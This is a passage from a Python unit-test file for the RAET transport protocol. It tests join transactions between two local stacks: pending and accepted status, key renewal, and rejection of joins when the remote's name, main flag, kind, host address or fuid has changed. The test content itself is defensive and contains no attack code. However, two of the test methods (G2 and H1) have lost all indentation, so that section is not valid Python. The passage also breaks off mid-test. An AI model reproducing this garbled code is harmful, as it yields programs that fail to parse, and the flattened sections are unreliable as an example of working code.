        self.assertNotEqual(alpha.local.role, oldRole)
        # persist the changed local role so the join request carries it
        alpha.dumpLocalRole()
        # Keys: Either
        # Sameness: Not sameall
        # Mutable: Yes
        self.assertIs(beta.mutable, True)
        # Ensure remote status is Pending
        # beta still keeps role data only under the old role name at this point
        roleData = beta.keep.loadRemoteRoleData(oldRole)
        self.assertEqual(roleData['role'], oldRole)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # the new role name has no keep data yet
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        beta.clearStats()
        alpha.clearStats()
        # Test
        # Renew: Yes
        self.join(beta, alpha, deid=betaRemoteAlpha.uid, duration=0.5)
        # Action: Pend, Dump
        self.assertIn('joiner_rx_renew', beta.stats)
        self.assertEqual(beta.stats['joiner_rx_renew'], 1)
        self.assertIn('join_renew_attempt', beta.stats)
        self.assertEqual(beta.stats['join_renew_attempt'], 1)
        self.assertIn('stale_nuid', alpha.stats)
        self.assertEqual(alpha.stats['stale_nuid'], 1)
        self.assertIn('joinent_rx_pend', alpha.stats)
        # NOTE(review): presumably pended once for the stale-nuid renew and once
        # for the rejoin, hence 2 -- confirm against the joinent state machine
        self.assertEqual(alpha.stats['joinent_rx_pend'], 2)
        # Transaction remains open while beta holds alpha pending
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 1)
            self.assertEqual(len(stack.remotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertIs(beta.mutable, True)
        self.assertFalse(self.sameAll(betaRemoteAlpha, betaRemoteAlphaSave))
        # role changed so even the role/keys comparison differs here
        self.assertFalse(self.sameRoleKeys(betaRemoteAlpha, betaRemoteAlphaSave))
        self.assertEqual(betaRemoteAlpha.role, alpha.local.role)
        self.assertIs(alphaRemoteBeta.acceptance, raeting.Acceptance.accepted.value)
        self.assertIs(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
        # Check remote dump with pended data
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIsNot(remoteData, None)
        self.assertIs(remoteData['fuid'], alphaRemoteBeta.nuid) # new value
        self.assertEqual(remoteData['role'], alpha.local.role) # new value
        self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(remoteData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(remoteData['pubhex']), alpha.local.priver.pubhex)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role) # new value
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Accept the transaction
        console.terse("\nAccept Transaction **************\n")
        beta.keep.acceptRemote(betaRemoteAlpha)
        # service long enough for the pended join to run to completion
        self.serviceStacks([alpha, beta], duration=3.0)
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            for remote in stack.remotes.values():
                self.assertTrue(remote.joined)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
        self.assertTrue(beta.mutable)
        self.assertIn('join_initiate_complete', beta.stats)
        self.assertEqual(beta.stats['join_initiate_complete'], 1)
        self.assertEqual(betaRemoteAlpha.role, alpha.local.role) # new role value
        self.assertIn('join_correspond_complete', alpha.stats)
        self.assertEqual(alpha.stats['join_correspond_complete'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        remoteData['ha'] = tuple(remoteData['ha'])
        self.assertTrue(self.sameAll(betaRemoteAlpha, remoteData))
        self.assertIs(remoteData['fuid'], alphaRemoteBeta.uid) # value
        self.assertEqual(remoteData['role'], 'alpha_new') # new role value
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Teardown: close sockets and clear persisted keep files
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerVacuousPendingPendSameAll(self):
        '''
        Test mutable joiner pend pending vacuous renewal join with same all (G1)
        '''
        console.terse("{0}\n".format(self.testJoinerVacuousPendingPendSameAll.__doc__))
        # Bootstrap: alpha is the main stack, beta the joiner; both mutable
        alpha, alphaData = self.bootstrapStack(name='alpha',
                                               ha=("", raeting.RAET_PORT),
                                               main=True,
                                               auto=raeting.AutoMode.once.value,
                                               role=None,
                                               kind=None,
                                               mutable=True, )
        self.assertIs(alpha.local.role, 'alpha')
        self.assertEqual(alpha.ha, ('0.0.0.0', raeting.RAET_PORT))
        self.assertEqual(alpha.local.ha, ('127.0.0.1', raeting.RAET_PORT))
        beta, betaData = self.bootstrapStack(name='beta',
                                             ha=("", raeting.RAET_TEST_PORT),
                                             main=None,
                                             auto=raeting.AutoMode.once.value,
                                             role=None,
                                             kind=None,
                                             mutable=True, )
        self.assertIs(beta.local.role, 'beta')
        self.assertEqual(beta.ha, ('0.0.0.0', raeting.RAET_TEST_PORT))
        self.assertEqual(beta.local.ha, ('127.0.0.1', raeting.RAET_TEST_PORT))
        # Do initial join vacuous join to setup rejoin with renew
        # create remote to join to alpha
        remote = beta.addRemote(estating.RemoteEstate(stack=beta,
                                                      fuid=0, # vacuous join
                                                      sid=0, # always 0 for join
                                                      ha=alpha.local.ha))
        self.join(beta, alpha, deid=remote.uid)
        # After the initial join both sides hold exactly one joined remote
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, True)
                self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        alphaRemoteBeta = alpha.remotes.values()[0]
        betaRemoteAlpha = beta.remotes.values()[0]
        # save the current state of beta stack remote for alpha
        betaRemoteAlphaSave = self.copyData(betaRemoteAlpha)
        # move alpha stack remote for beta to different uid (nuid) to force renew
        oldUid = alphaRemoteBeta.uid
        alpha.moveRemote(alphaRemoteBeta, alphaRemoteBeta.uid + 1)
        self.assertNotEqual(alphaRemoteBeta.uid, oldUid)
        self.assertIs(alpha.remotes[alphaRemoteBeta.uid], alphaRemoteBeta)
        # Status: Pending
        beta.keep.pendRemote(betaRemoteAlpha)
        self.assertEqual(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
        beta.keep.auto = raeting.AutoMode.never.value
        self.assertEqual(beta.keep.auto, raeting.AutoMode.never.value)
        # Name: Old
        # Main: Old
        # Kind: Old
        # RHA: Old
        # Nuid: Old
        # Fuid: Body
        # Leid: Old
        # Reid: 0
        # Role: Old
        # Keys: Old
        # Sameness: Sameall
        # Mutable: Either
        self.assertIs(beta.mutable, True)
        # Ensure remote status is Pending
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        beta.clearStats()
        alpha.clearStats()
        # Test
        # Renew: Yes
        self.join(beta, alpha, deid=betaRemoteAlpha.uid, duration=0.5)
        # Action: Pend, Dump
        self.assertIn('joiner_rx_renew', beta.stats)
        self.assertEqual(beta.stats['joiner_rx_renew'], 1)
        self.assertIn('join_renew_attempt', beta.stats)
        self.assertEqual(beta.stats['join_renew_attempt'], 1)
        self.assertIn('stale_nuid', alpha.stats)
        self.assertEqual(alpha.stats['stale_nuid'], 1)
        self.assertIn('joinent_rx_pend', alpha.stats)
        # NOTE(review): presumably pended once for the stale-nuid renew and once
        # for the rejoin, hence 2 -- confirm against the joinent state machine
        self.assertEqual(alpha.stats['joinent_rx_pend'], 2)
        # Transaction remains open while beta holds alpha pending
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 1)
            self.assertEqual(len(stack.remotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertIs(beta.mutable, True)
        # only the fuid changed (renew), so sameAll fails but role/keys match
        self.assertFalse(self.sameAll(betaRemoteAlpha, betaRemoteAlphaSave))
        self.assertTrue(self.sameRoleKeys(betaRemoteAlpha, betaRemoteAlphaSave))
        self.assertEqual(betaRemoteAlpha.fuid, alphaRemoteBeta.nuid)
        self.assertIs(alphaRemoteBeta.acceptance, raeting.Acceptance.accepted.value)
        self.assertIs(betaRemoteAlpha.acceptance, raeting.Acceptance.pending.value)
        # Check remote dump with pended data
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIsNot(remoteData, None)
        self.assertIs(remoteData['fuid'], alphaRemoteBeta.nuid) # new value
        self.assertEqual(remoteData['role'], alpha.local.role)
        self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(remoteData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(remoteData['pubhex']), alpha.local.priver.pubhex)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Accept the transaction
        console.terse("\nAccept Transaction **************\n")
        beta.keep.acceptRemote(betaRemoteAlpha)
        # service long enough for the pended join to run to completion
        self.serviceStacks([alpha, beta], duration=3.0)
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            for remote in stack.remotes.values():
                self.assertTrue(remote.joined)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
        self.assertTrue(beta.mutable)
        self.assertIn('join_initiate_complete', beta.stats)
        self.assertEqual(beta.stats['join_initiate_complete'], 1)
        self.assertIn('join_correspond_complete', alpha.stats)
        self.assertEqual(alpha.stats['join_correspond_complete'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        remoteData['ha'] = tuple(remoteData['ha'])
        self.assertTrue(self.sameAll(betaRemoteAlpha, remoteData))
        self.assertIs(remoteData['fuid'], alphaRemoteBeta.uid) # value
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Teardown: close sockets and clear persisted keep files
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
def testJoinerVacuousPendingNorenewPendSameAll(self):
'''
Test mutable joiner pend pending vacuous non renewal join with same all (G2)
'''
console.terse("{0}\n".format(self.testJoinerVacuousPendingNorenewPendSameAll.__doc__))
# Mode: Never
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: Yes
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Pending
beta.keep.pendRemote(betaRemote)
# Name: Body
# Main: Body
# Kind: Body
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: Body
# Keys: Body
# Sameness: SameAll
keep = self.copyData(betaRemote, fuid=alphaRemote.nuid)
# Mutable: Yes
beta.mutable = True
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
# Renew: No
self.join(beta, alpha, deid=betaRemote.nuid, renewal=False, duration=0.50)
# Action: Pend, Dump
for stack in [alpha, beta]:
# self.assertEqual(len(stack.transactions), 1) #b=0
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemote.acceptance, raeting.Acceptance.pending.value)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousImmutableRejectNewName(self):
'''
Test immutable joiner reject non vacuous join with updated name (H1)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousImmutableRejectNewName.__doc__))
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks()
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Name: New
oldName = alpha.name
newName = '{0}_new'.format(oldName)
alpha.name = newName
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: No
self.assertIs(beta.mutable, None)
# Ensure remote status is None
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
self.join(beta, alpha)
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 0)
self.assertEqual(len(alpha.nameRemotes), 0)
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
self.assertIs(remoteData, None)
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
    def testJoinerNonVacuousImmutableRejectNewMain(self):
        '''
        Test immutable joiner reject non vacuous join with updated main (H2)

        Scenario: beta (joiner) already has a remote estate for alpha whose
        cached main flag (False) differs from alpha's actual main (True).
        Because beta.mutable is None (immutable), the join transaction must
        fail on both sides and beta's cached remote must be left unchanged.
        '''
        console.terse("{0}\n".format(self.testJoinerNonVacuousImmutableRejectNewMain.__doc__))
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapStacks()
        # Vacuous: No
        # Main: New (set main to false in betaRemote)
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           main=False,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        # NOTE(review): alphaRemote is constructed with stack=beta but added to
        # alpha below -- nuid is drawn from beta's counter; confirm intended.
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        betaRemote.fuid = alphaRemote.nuid
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Name: Either
        # Main: New
        self.assertIs(betaRemote.main, False)
        self.assertIs(alpha.main, True)
        # Kind: Either
        # RHA: Either
        # Nuid: Old
        # Fuid: Either
        # Leid: Old
        # Reid: Either
        # Role: Either
        # Keys: Either
        # Sameness: Not sameall
        keep = self.copyData(betaRemote)  # snapshot to prove the remote is untouched
        # Mutable: No
        self.assertIs(beta.mutable, None)
        # Ensure remote status is None
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        # Test
        self.join(beta, alpha)
        # Action: Reject
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertIs(stack.mutable, None)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertIs(remote.acceptance, None)
        # Alpha drops its remote on reject; beta keeps (but does not modify) its own.
        self.assertEqual(len(alpha.remotes), 0)
        self.assertEqual(len(alpha.nameRemotes), 0)
        self.assertEqual(len(beta.remotes), 1)
        self.assertEqual(len(beta.nameRemotes), 1)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], None)
        self.assertEqual(roleData['verhex'], None)
        self.assertEqual(roleData['pubhex'], None)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerNonVacuousImmutableRejectNewKind(self):
        '''
        Test immutable joiner reject non vacuous join with updated kind (H3)

        Scenario: alpha changes its estate kind after beta cached a remote
        for it.  Immutable beta (mutable is None) must reject the join and
        leave its cached remote unchanged.
        '''
        console.terse("{0}\n".format(self.testJoinerNonVacuousImmutableRejectNewKind.__doc__))
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapStacks()
        # Vacuous: No
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           main=True,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        betaRemote.fuid = alphaRemote.nuid
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Name: Either
        # Main: Either
        # Kind: New
        oldKind = None
        newKind = 33  # arbitrary non-default kind value to force a mismatch
        self.assertIs(alpha.kind, oldKind)
        alpha.kind = newKind
        # RHA: Either
        # Nuid: Old
        # Fuid: Either
        # Leid: Old
        # Reid: Either
        # Role: Either
        # Keys: Either
        # Sameness: Not sameall
        keep = self.copyData(betaRemote)  # snapshot to prove the remote is untouched
        # Mutable: No
        self.assertIs(beta.mutable, None)
        # Ensure remote status is None
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        # Test
        self.join(beta, alpha, deid=betaRemote.nuid)
        # Action: Reject
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertIs(stack.mutable, None)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertIs(remote.acceptance, None)
        self.assertEqual(len(alpha.remotes), 0)
        self.assertEqual(len(alpha.nameRemotes), 0)
        self.assertEqual(len(beta.remotes), 1)
        self.assertEqual(len(beta.nameRemotes), 1)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], None)
        self.assertEqual(roleData['verhex'], None)
        self.assertEqual(roleData['pubhex'], None)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerNonVacuousImmutableRejectNewRha(self):
        '''
        Test immutable joiner reject non vacuous join with updated host address (H4)

        Scenario: the join is driven manually (tx/rx one side at a time) so
        that beta's cached remote host address can be faked mid-transaction,
        making alpha appear to respond from a new address.  Immutable beta
        must then reject the join.
        '''
        console.terse("{0}\n".format(self.testJoinerNonVacuousImmutableRejectNewRha.__doc__))
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapStacks()
        # Simulate: beta already knows alpha with ha=('127.0.0.1', 7532)
        #           alpha responds with ha=('127.0.0.1', 7530)
        fakeHa = (alpha.local.ha[0], 7532)
        realHa = (alpha.local.ha[0], alpha.local.ha[1])
        # Vacuous: No
        betaRemoteAlpha = estating.RemoteEstate(stack=beta,
                                                fuid=0,
                                                sid=0, # always 0 for join
                                                ha=realHa,
                                                main=True,
                                                name=alpha.name,
                                                verkey=alpha.local.signer.verhex,
                                                pubkey=alpha.local.priver.pubhex)
        alphaRemoteBeta = estating.RemoteEstate(stack=beta,
                                                fuid=betaRemoteAlpha.nuid,
                                                ha=beta.local.ha,
                                                name=beta.name,
                                                verkey=beta.local.signer.verhex,
                                                pubkey=beta.local.priver.pubhex)
        betaRemoteAlpha.fuid = alphaRemoteBeta.nuid
        alpha.addRemote(alphaRemoteBeta)
        beta.addRemote(betaRemoteAlpha)
        # Name: Either
        # Main: Either
        # Kind: Either
        # RHA: New
        # Nuid: Old
        # Fuid: Either
        # Leid: Old
        # Reid: Either
        # Role: Either
        # Keys: Either
        # Sameness: Not sameall
        self.assertEqual(betaRemoteAlpha.ha, realHa)
        self.assertEqual(alpha.local.ha, realHa)
        # Ensure remote status is None
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        # Test
        console.terse("\n Rejoin with new host address **************\n")
        # Drive the first leg of the join by hand: beta sends, alpha receives
        # and acks, so the ha swap below happens before beta processes the ack.
        beta.join(uid=betaRemoteAlpha.uid)
        beta.serviceOneAllTx()
        self.store.advanceStamp(0.05)
        time.sleep(0.05)
        alpha.serviceOneAllRx()
        alpha.serviceOneAllTx() # Join ack
        self.store.advanceStamp(0.05)
        time.sleep(0.05)
        # Change betaRemoteAlpha Rha value to make beta think alpha respond from new HA
        betaRemoteAlpha.ha = fakeHa
        keep = self.copyData(betaRemoteAlpha)  # snapshot after the fake, before the finish
        # Finish join
        self.serviceStacks([beta, alpha])
        # Action: Reject
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertIs(stack.mutable, None)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertEqual(len(alpha.remotes), 1)
        self.assertEqual(len(alpha.nameRemotes), 1)
        self.assertEqual(len(beta.remotes), 1)
        self.assertEqual(len(beta.nameRemotes), 1)
        self.assertIs(betaRemoteAlpha.acceptance, None)
        # Assert betaRemote isn't modified
        self.assertTrue(self.sameAll(betaRemoteAlpha, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], None)
        self.assertEqual(roleData['verhex'], None)
        self.assertEqual(roleData['pubhex'], None)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerNonVacuousImmutableRejectNewFuid(self):
        '''
        Test immutable joiner reject non vacuous join with updated fuid/reid (H5)

        Scenario: after beta initiates the join, its cached remote fuid is
        overwritten with a fake value so alpha's response (carrying the
        original fuid) no longer matches.  Immutable beta must reject.
        '''
        console.terse("{0}\n".format(self.testJoinerNonVacuousImmutableRejectNewFuid.__doc__))
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapStacks()
        # Vacuous: No
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           main=True,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        betaRemote.fuid = alphaRemote.nuid
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Name: Either
        # Main: Either
        # Kind: Either
        # RHA: Either
        # Nuid: Old
        # Fuid: New:
        #   1. Initiate join with initFuid
        #   2. Update betaRemote.fuid = fakeFuid
        #   3. Accept alpha responce:
        #       - alpha will respond with initFuid
        #       - beta will know fakeFuid
        initFuid = alphaRemote.nuid
        fakeFuid = initFuid + 10  # any value != initFuid forces the mismatch
